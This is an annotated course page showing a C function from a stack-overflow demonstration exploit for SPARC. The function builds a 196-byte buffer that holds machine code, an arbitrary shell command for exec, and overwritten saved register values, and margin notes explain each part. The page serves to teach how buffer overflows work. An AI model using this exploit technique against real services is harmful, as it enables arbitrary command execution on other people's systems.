|
|
| exploit.c |
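/*
 * Build the 196-byte buffer used in this stack-overflow demonstration and
 * write it to fd.
 *
 * Layout, using the sizes given in the accompanying notes (128 bytes for
 * name, 4 bytes unused space, 64 bytes for the saved registers):
 *
 *   [0, CODESIZE)               machine code copied from code
 *   [CODESIZE, ...)             command, including its terminating NUL
 *   [sizeof buffer - 8, end)    8 bytes copied from links; per the notes
 *                               these land on the saved copies of %i6/%i7
 *
 * code, CODESIZE and links are defined elsewhere in exploit.c.
 *
 * fd:      descriptor the buffer is written to
 * command: NUL-terminated command string placed behind the code
 *
 * Nothing is returned; failures are only reported on stderr.
 *
 * NOTE(review): the receiving program is not shown here. Presumably it
 * copies its input into the 128-byte name without a length limit; bounding
 * that copy is the fix on the receiving side.
 */
void fillbuffer(int fd, char * command) {
    enum { LINKS_LEN = 8 };          /* bytes reserved at the end for links */
    char buffer[196];
    size_t cmdlen = strlen(command) + 1;   /* include the terminating NUL */
    ssize_t nbytes;

    /*
     * The original copied command without any length check. A long command
     * would run past the end of this local buffer, and a command reaching
     * into the last LINKS_LEN bytes would have its tail (and its NUL)
     * overwritten by links. Refuse such input instead.
     */
    if (CODESIZE > sizeof buffer - LINKS_LEN ||
        cmdlen > sizeof buffer - LINKS_LEN - CODESIZE) {
        fprintf(stderr, "command too long for buffer\n");
        return;
    }

    bzero(buffer, sizeof(buffer));
    bcopy(code, buffer, CODESIZE);
    bcopy(command, buffer + CODESIZE, cmdlen);
    bcopy(links, buffer + sizeof buffer - LINKS_LEN, LINKS_LEN);

    /* A short write counts as a failure as well as an error return. */
    nbytes = write(fd, buffer, sizeof buffer);
    if (nbytes != (ssize_t) sizeof buffer) {
        fprintf(stderr, "unable to send exploit buffer\n");
    }
}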
|
![]() | 128 bytes for name, 4 bytes
unused space, and 64 bytes for the saved
registers sum up to 196 bytes.
|
![]() | The malicious code is placed at the beginning
of the buffer.
|
![]() | To be flexible, our code executes an
exec call with an arbitrary shell command.
|
![]() | Finally, we need some values for the
saved copies of %i6 and %i7.
|
![]() | %i6 must not be 0. Otherwise, the victim
would crash before the copy of %i7 is
used.
|
|
| Copyright © 2001, 2002 Andreas Borchert, converted to HTML on April 07, 2002 |